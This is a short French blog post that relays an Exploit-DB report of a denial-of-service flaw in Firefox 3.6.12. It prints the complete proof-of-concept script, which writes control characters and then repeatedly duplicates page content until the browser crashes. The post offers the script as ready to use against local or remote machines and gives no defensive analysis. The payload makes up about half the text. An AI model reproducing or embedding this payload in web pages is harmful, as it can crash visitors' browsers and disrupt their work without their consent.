Internet,  Sécurity

Attaque DOS sur Firefox 3.6.12

Merci à Exploit-DB qui nous informe d’une nouvelle faille Zero Day concernant la dernière version stable de Mozilla Firefox.

Un petit script permet de planter une machine locale ou distante :

<script>document.write("\u0000\u0001\u0002\u0003\u0004\u0005")</script>
<script>
var i=0;
for (i=0;i<=19999;i++)
{
document.write("a");}
for (i=0;i<=3;i++)
{
document.write(document.body.innerHTML);}
</script>

Il n’y a plus qu’à attendre le correctif de sécurité…

Software Engineeer at Red Hat, Private Pilot, French guy hiding somewhere in Canada.